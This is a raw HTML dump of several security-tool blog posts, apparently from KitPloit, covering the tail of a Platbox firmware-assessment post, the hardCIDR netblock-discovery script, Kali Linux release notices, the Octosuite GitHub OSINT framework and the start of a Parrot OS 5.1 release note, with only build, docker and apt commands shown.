href="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7233974935195861698" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw=w640-h614" width="640" /></a></p><p dir="auto" style="text-align: center;"> <a href="https://github.com/IOActive/Platbox/blob/main/example_chipset_output_amd2.png" rel="nofollow" target="_blank" title="UEFI and SMM Assessment Tool (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh2k-HptDlnJCwTYpVDdIBZaX4714UBaNyBEFThETVLDeQ1Ler2uWb9ehtAbiW3V4X4sbysitMpvQWM8AxpVdWRvKl4kslL4UBL7Kixage2JpqjMDCOEEAcR13Dd4J5l07HZu0SNd-fSjOJfl99veeqOlzk6_sFwx-Yi-pqbnX3pwyff6yLRMq9ED-arA"><img alt="" border="0" height="490" id="BLOGGER_PHOTO_ID_7233974944526510674" src="https://blogger.googleusercontent.com/img/a/AVvXsEh2k-HptDlnJCwTYpVDdIBZaX4714UBaNyBEFThETVLDeQ1Ler2uWb9ehtAbiW3V4X4sbysitMpvQWM8AxpVdWRvKl4kslL4UBL7Kixage2JpqjMDCOEEAcR13Dd4J5l07HZu0SNd-fSjOJfl99veeqOlzk6_sFwx-Yi-pqbnX3pwyff6yLRMq9ED-arA=w640-h490" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Project Structure</h2> <p dir="auto">The project is divided as follows:</p> <ul dir="auto"> <li>PlatboxDrv: kernel drivers used for Linux and Windows.</li> <li>PlatboxLib: the usermode component that loads the <a href="https://www.kitploit.com/search/label/Kernel%20Driver" target="_blank" title="kernel driver">kernel driver</a> and provides access to all the previously listed features.</li> <li>PlatboxCli: a <a href="https://www.kitploit.com/search/label/Console" target="_blank" title="console">console</a> <a href="https://www.kitploit.com/search/label/Client" target="_blank" title="client">client</a> that uses the library.</li> <li>Pocs: an example of a program using features from the libary.</li> </ul> <h2 dir="auto" tabindex="-1">Compilation Steps</h2> <h3 dir="auto" tabindex="-1">Windows</h3> <div>Release Build <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="cmake -G "Visual Studio 17 2022" -A x64 -S .. -B "build64" cmake --build build64/ --target platbox_cli --config Release"><pre><code>cmake -G "Visual Studio 17 2022" -A x64 -S .. -B "build64" <br />cmake --build build64/ --target platbox_cli --config Release<br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/IOActive/Platbox" rel="nofollow" target="_blank" title="Download Platbox">Download Platbox</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-50271434804902572212023-05-02T12:05:00.000-04:002023-05-02T12:05:04.831-04:00hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg"><img alt="" border="0" height="538" id="BLOGGER_PHOTO_ID_7209873746744199458" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg=w640-h538" width="640" /></a></p><p><br /></p> <p dir="auto">A Linux Bash script to <a href="https://www.kitploit.com/search/label/Discover" target="_blank" title="discover">discover</a> the netblocks, or ranges, (in CIDR notation) owned by the target organization during the <a href="https://www.kitploit.com/search/label/Intelligence%20Gathering" target="_blank" title="intelligence gathering">intelligence gathering</a> phase of a penetration test. This information is maintained by the five Regional Internet Registries (RIRs):</p> <p dir="auto"><em>ARIN</em> (North America)<br /> <em>RIPE</em> (Europe/Asia/Middle East)<br /> <em>APNIC</em> (Asia/Pacific)<br /> <em>LACNIC</em> (Latin America)<br /> <em>AfriNIC</em> (Africa)</p> <p dir="auto">In addition to netblocks and IP addresses, Autonomous System Numbers (ASNs) are also of interest. ASNs are used as part of the Border Gateway Protocol (BGP) for uniquely identifying each network on the Internet. Target organizations may have their own ASNs due to the size of their network or as a result of redundant service paths from peered service providers. These ASNs will reveal additional netblocks owned by the organization.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">ipcalc (for RIPE, APNIC, LACNIC, AfriNIC queries)</p> <h2 dir="auto" tabindex="-1">LACNIC</h2> <p dir="auto">A note on LACNIC before diving into the usage. LACNIC only allows query of either network range, ASN, Org Handle, or PoC Handle. This does not help us in locating these values based upon the organization name. They do however publish a list of all assigned ranges on a publically accessible FTP server, along with their rate-limiting thresholds. So, there is an accompanying data file, which the script checks for, used to perform LACNIC queries locally. The script includes an update option <strong>-r</strong>, that can be used to update this data on an interval of your choosing. Approximate run time is just shy of 28 hours.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. The <strong>-h</strong> option lists the help:</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/437d1ecd09aa4268cc4ef868253e537028318036f5de5f0381ef1a7553e5ef8c/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67312e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgkbrEe6O1fF0nfbYxO18Bqs5DD4hEUGXRzAfRS0l0GECrMD8O3LRBPh6Augu6YvePB_j6Hnj0-3OBsXAMBw6_KHHJEwlIEb9tBE0OQeH289bxJ8gD9ppyBWR04lBJ8tnbyuMyYF0m91XooHtRXMDnJ10DSsW0ewDfA9iIU_cO9oE577e_3qGBqNYBNQA"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7209873721618169426" src="https://blogger.googleusercontent.com/img/a/AVvXsEgkbrEe6O1fF0nfbYxO18Bqs5DD4hEUGXRzAfRS0l0GECrMD8O3LRBPh6Augu6YvePB_j6Hnj0-3OBsXAMBw6_KHHJEwlIEb9tBE0OQeH289bxJ8gD9ppyBWR04lBJ8tnbyuMyYF0m91XooHtRXMDnJ10DSsW0ewDfA9iIU_cO9oE577e_3qGBqNYBNQA=w640-h278" width="640" /></a></p> <p dir="auto">The options may be used in any combination, all, or none. Unfortunately, none of the “other” RIRs note the actual CIDR notation of the range, so <code>ipcalc</code> is used to perform this function. If it is not installed on your system, the script will install it for you.</p> <p dir="auto">At the prompts, enter the organization name, the email domain, and whether country codes are used as part of the email. If answered <strong>Y</strong> to country codes, you will be prompted as to whether they precede the domain name or are appended to the TLD. A <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> will be created for the output files in /tmp/. If the directory is found to exist, you will be prompted whether to overwrite. If answered <strong>N</strong>, a time stamp will be appended to the directory name.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/d6e7b07bc317e2aa6b6c28ad163254ab57ece1dc8caadf5ba6be21f3f2c837df/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67322e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjtwLIQwW6jqe4Lq_qsOzGZJJwS0kJAOMYj5yvAdx-GyKugry7N-CKZx03i-e_Ak2BDP9UHH7GYtlo8SBcg6LaGG12suvIEBxuuRehLXeUPyofebvJIUbmNGbP9xbj5RVXwWfOV9rgc-q5hM3WABRdmWSNHl7O4jYw6KJ13wymnsVZy75ZvSwXY8wV3mA"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7209873732258882178" src="https://blogger.googleusercontent.com/img/a/AVvXsEjtwLIQwW6jqe4Lq_qsOzGZJJwS0kJAOMYj5yvAdx-GyKugry7N-CKZx03i-e_Ak2BDP9UHH7GYtlo8SBcg6LaGG12suvIEBxuuRehLXeUPyofebvJIUbmNGbP9xbj5RVXwWfOV9rgc-q5hM3WABRdmWSNHl7O4jYw6KJ13wymnsVZy75ZvSwXY8wV3mA=w640-h278" width="640" /></a></p> <p dir="auto">The script queries each RIR, as well as a BGP route server, prompting along the way as to whether records were located. Upon completion, three files will be generated: a CSV based on Org Handle, a CSV based on PoC Handle, and a line delimited file of all located raanges in CIDR notation.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/4328831e5e4d3ab30a0de41521709dd3aa75a2f28a66c851adce9bf15d20737c/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67332e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg"><img alt="" border="0" height="538" id="BLOGGER_PHOTO_ID_7209873746744199458" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg=w640-h538" width="640" /></a></p> <p dir="auto">Cancelling the script at any time will remove any temporary working files and the directory created for the resultant output files.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/45cdc60c0cbf4f1d7f0589c911ff445865857ecdcd771a791673a74a22794cee/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67342e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhXHaRCZUcoQd286N34iiUN8QC_b3uuaNZia09e8joLm-kTcppEeAGQ2Egzo4xXMbYtrjDhWGq3fQAi-HBfAtnh116tEy-2VDIRSzyQQ8NGsZNSb5rZnEwwDi6c7II2SVAjlw1ZapYblsaJXZDABwAexJ_z3GnIPaLbK_rhIs6oBVWcnsaDPtKkHWM8tQ"><img alt="" border="0" height="144" id="BLOGGER_PHOTO_ID_7209873758061534146" src="https://blogger.googleusercontent.com/img/a/AVvXsEhXHaRCZUcoQd286N34iiUN8QC_b3uuaNZia09e8joLm-kTcppEeAGQ2Egzo4xXMbYtrjDhWGq3fQAi-HBfAtnh116tEy-2VDIRSzyQQ8NGsZNSb5rZnEwwDi6c7II2SVAjlw1ZapYblsaJXZDABwAexJ_z3GnIPaLbK_rhIs6oBVWcnsaDPtKkHWM8tQ=w640-h144" width="640" /></a></p> <p dir="auto">It should be noted that, due to similarity in some organization names, you could get back results not related to the target. The CSV files will provide the associated handles and URLs for further validation where necessary. It is also possible that employees of the target organization used their corporate email address to register their own domains. These will be found within the results as well.</p> <h2 dir="auto" tabindex="-1">Running with Docker</h2> <div><pre><code>docker build -t hardcidr .<br /></code></pre></div> <p dir="auto">Building the hardcidr image</p> <div><pre><code>docker run -v $(pwd):/tmp -it hardcidr<br /></code></pre></div> <p dir="auto">Running the container. Output will be saved to current directory</p> <h2 dir="auto" tabindex="-1">Additional Information</h2> <p dir="auto">For more information, check out the blog post on the TrustedSec website: <a href="https://www.trustedsec.com/blog/classy-inter-domain-routing-enumeration/" rel="nofollow" target="_blank" title="Classy Inter-Domain Routing Enumeration">Classy Inter-Domain Routing Enumeration</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/trustedsec/hardcidr" rel="nofollow" target="_blank" title="Download Hardcidr">Download Hardcidr</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9458235984072908842023-03-15T22:45:00.000-03:002023-03-15T22:45:08.356-03:00Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmYhOMjpsu7hngVFcQBa-2pDOwYYGMpNzXeRgSF72yscBBtZmUzg4NzARWxOeG5UMmAb4qQDxo_xNzoFzrwuknQ_Nw0yf9G8ZB9HlfBdHqtQX-DChEQ2NgtorWqBZysROB3UZg4TM9lTkOSmRLBeqweGSnpz3_pAEk0Zd8akbXTbfLLn497UyM5GgVvw/s1200/kali-2023.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmYhOMjpsu7hngVFcQBa-2pDOwYYGMpNzXeRgSF72yscBBtZmUzg4NzARWxOeG5UMmAb4qQDxo_xNzoFzrwuknQ_Nw0yf9G8ZB9HlfBdHqtQX-DChEQ2NgtorWqBZysROB3UZg4TM9lTkOSmRLBeqweGSnpz3_pAEk0Zd8akbXTbfLLn497UyM5GgVvw/w640-h334/kali-2023.1-release.jpg" width="640" /></a></div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>he <a href="https://bugs.kali.org/changelog_page.php">changelog</a> summary since the <a href="https://www.kali.org/blog/kali-linux-2022-4-release/">2022.4 release from December</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#kali-purple">Kali Purple</a></strong> - The dawn of a new era. Kali is not only Offense, but starting to be defense</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#python-updates--changes">Python Changes</a></strong> - Python 3.11 & PIP changes going forward</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#2023-theme-refresh">2023 Theme</a></strong> - Our once a year theme update! This time, what’s old is new again</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#desktop-updates">Desktop Updates</a></strong> - Xfce 4.18 & KDE Plasma 5.27</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#default-kernel-settings">Default Kernel Settings</a></strong> - What makes the Kali kernel different</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new tools added</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-1-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19668940064311049932022-12-19T17:05:00.000-03:002022-12-19T17:05:00.270-03:00Kali Linux 2022.4 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLEEw6Z3WyTvNIiKvv_J8ZBkwzQhYu3MRT6tiNkwp5BuJEdxA0TVanEKOc5FV6dbAZuFTn_zDuhmTVCVEsLvKvyg4Ia1NYbQGqRQKC-PVwJdJ2l0oUAaEih6fCEz6EV6zHLr3vfmlpc2LMbkKvf1f17fCxgP9uNFPKXX3hqi3LdWfa36ClpFPwS2Qgxg/s1200/kali-linux-2022.4-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLEEw6Z3WyTvNIiKvv_J8ZBkwzQhYu3MRT6tiNkwp5BuJEdxA0TVanEKOc5FV6dbAZuFTn_zDuhmTVCVEsLvKvyg4Ia1NYbQGqRQKC-PVwJdJ2l0oUAaEih6fCEz6EV6zHLr3vfmlpc2LMbkKvf1f17fCxgP9uNFPKXX3hqi3LdWfa36ClpFPwS2Qgxg/w640-h334/kali-linux-2022.4-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.4. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>A summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since <a href="https://www.kali.org/blog/kali-linux-2022-3-release/">August’s 2022.3 release</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#microsoft-azure">Microsoft Azure</a></strong> - We are back on the Microsoft Azure store</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#more-platforms">More Platforms</a></strong> - Generic Cloud, QEMU VM image & Vagrant libvirt</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#social-networks">Social Networks</a></strong> - New homes, keeping in touch & press packs</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#kali-nethunter-pro-release">Kali NetHunter Pro</a></strong> - Announcing the first release of a “true” Kali Linux on the mobile phone (PinePhone / Pro)</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#kali-nethunter-update">Kali NetHunter</a></strong> - Internal Bluetooth support, kernel porting video, firmware updates & other improvements</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#desktop-updates">Desktop Updates</a></strong> - GNOME 43 & KDE 5.26</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new packages added</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-4-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.4</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-2381306212539943852022-12-17T08:30:00.011-03:002022-12-17T08:30:00.299-03:00Octosuite - Advanced Github OSINT Framework<p></p><p></p><p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjJoueB5KvYq1NY5FBDb54s5y2RtkyDb-WhZNham7UiI28_Gf3kqyi5cxdNtKPN3q96mAW8RGu2mpxBf-5cfl4GYrRkNxURo8MvQ9zjsgW_-ZCK27NnyWfQlzCNVrjazwRgelnbFEuMRN0Gg8iWn5tPZsJ-HUfnY2AldmtJQMeKhx060C1NGpOoJS2SHA"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7173878148407791650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjJoueB5KvYq1NY5FBDb54s5y2RtkyDb-WhZNham7UiI28_Gf3kqyi5cxdNtKPN3q96mAW8RGu2mpxBf-5cfl4GYrRkNxURo8MvQ9zjsgW_-ZCK27NnyWfQlzCNVrjazwRgelnbFEuMRN0Gg8iWn5tPZsJ-HUfnY2AldmtJQMeKhx060C1NGpOoJS2SHA=w640-h360" width="640" /></a></p><p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/74001397/186889897-c1c17fac-fddc-4967-9084-39cfe2d1307f.png" rel="nofollow" target="_blank" title="Advanced Github OSINT Framework (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh0EuAYFhz1FnYrGIAS33DpulfABwiTyO1KO2X_1LeQHE7GEgb8WSALsCVRVNK5QqmyDBm8hnKdzafahwclMyQgrkUwBY6JWG4ut3p8FVcQIVP30w9aW819q8Pdd4uuWgGgRx7qlI8VaPmfx_l46vmoe-lF7YQog6o3oDNEbKbnenRJadTNkFhRwv_1Yw"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7173878151514476066" src="https://blogger.googleusercontent.com/img/a/AVvXsEh0EuAYFhz1FnYrGIAS33DpulfABwiTyO1KO2X_1LeQHE7GEgb8WSALsCVRVNK5QqmyDBm8hnKdzafahwclMyQgrkUwBY6JWG4ut3p8FVcQIVP30w9aW819q8Pdd4uuWgGgRx7qlI8VaPmfx_l46vmoe-lF7YQog6o3oDNEbKbnenRJadTNkFhRwv_1Yw=w640-h360" width="640" /></a></p><p dir="auto"><br /></p> <p dir="auto">A framework fro <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> <a href="https://www.kitploit.com/search/label/OSINT" target="_blank" title="osint">osint</a> on GitHub users, <a href="https://www.kitploit.com/search/label/Repositories" target="_blank" title="repositories">repositories</a> and organizations</p> <span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Wiki</h1> <p dir="auto"><a href="https://github.com/bellingcat/octosuite/wiki" rel="nofollow" target="_blank" title="Refer to the Wiki">Refer to the Wiki</a> for installation instructions, in addition to all other documentation.</p> <h1 dir="auto">Features</h1> <ul class="contains-task-list"> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches an organization's profile information</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches an oganization's events</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns an organization's repositories</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns an organization's public members</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a repository's information</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns a repository's contributors</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns a repository's languages</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a repository's stargazers</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a repository's forks</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a repository's releases</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns a list of files in a specified path of a repository</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a user's profile information</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns a user's gists</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns organizations that a user owns/belongs to</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a user's events</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a list of users followed by the target</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Fetches a user's followers</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Checks if user A follows user B</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Checks if user is a public member of an organizations</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Returns a user's subscriptions</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Gets a user's subscriptions</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Gets a user's events</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Searches users</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Searches repositories</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Searches topics</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Searches issues</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Searches commits</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Automatically <a href="https://www.kitploit.com/search/label/Logs" target="_blank" title="logs">logs</a> network activity (.logs folder)</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> User can view, read and delete logs</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> ...And more</li> </ul> <h2 dir="auto">Note</h2> <blockquote> <p dir="auto">Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder</p></blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bellingcat/octosuite" rel="nofollow" target="_blank" title="Download Octosuite">Download Octosuite</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-26101927905293205712022-10-07T00:56:00.001-03:002022-10-07T00:56:23.199-03:00Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjurce2jTY2YVJZXrwfGY2YzGs8IRoQDZP9GFfbWnS__2Ccg1WL0jpqJ9B1PhfVz3OugUjVM9tiOZKoJ4fXljNnubNjfrbJHwp9zJrFNnNfHKJNPK9E8d9MI8OFP4qV2P6EL0vrDq7ePBcN38O6WxI3RYGG0Wh--fvDXE56ukC9tk2t3WrHOc6-Y0BZoA/s1920/parrot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="984" data-original-width="1920" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjurce2jTY2YVJZXrwfGY2YzGs8IRoQDZP9GFfbWnS__2Ccg1WL0jpqJ9B1PhfVz3OugUjVM9tiOZKoJ4fXljNnubNjfrbJHwp9zJrFNnNfHKJNPK9E8d9MI8OFP4qV2P6EL0vrDq7ePBcN38O6WxI3RYGG0Wh--fvDXE56ukC9tk2t3WrHOc6-Y0BZoA/w640-h328/parrot.png" width="640" /></a></div><p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Parrot
OS 5.1 is officially released.
We're proud to say that the new version of Parrot OS 5.1 is available
for download; this new version includes a lot of improvements and
updates that makes the distribution more performing and more secure.<span></span></p><a name='more'></a><p></p>
<h3 style="text-align: left;">How do I get Parrot OS?</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You can download Parrot OS by clicking <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="http://parrotsec.org/download">here</a> and, as always, we invite you to never trust third part and unofficial sources.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">If
you need any help or in case the direct downloads don't work for you,
we also provide official Torrent files, which can circumvent firewalls
and network restrictions in most cases.</p>
<h3 style="text-align: left;">How do I upgrade from a previous version?</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">First of all, we always suggest to update your version for being sure that is stable and functional.
You can upgrade an existing system via APT using one of the following commands:</p>
<ul>
<li><code>sudo parrot-upgrade</code></li>
</ul>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">or</p>
<ul>
<li><code>sudo apt update && sudo apt full-upgrade</code></li>
</ul>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Even
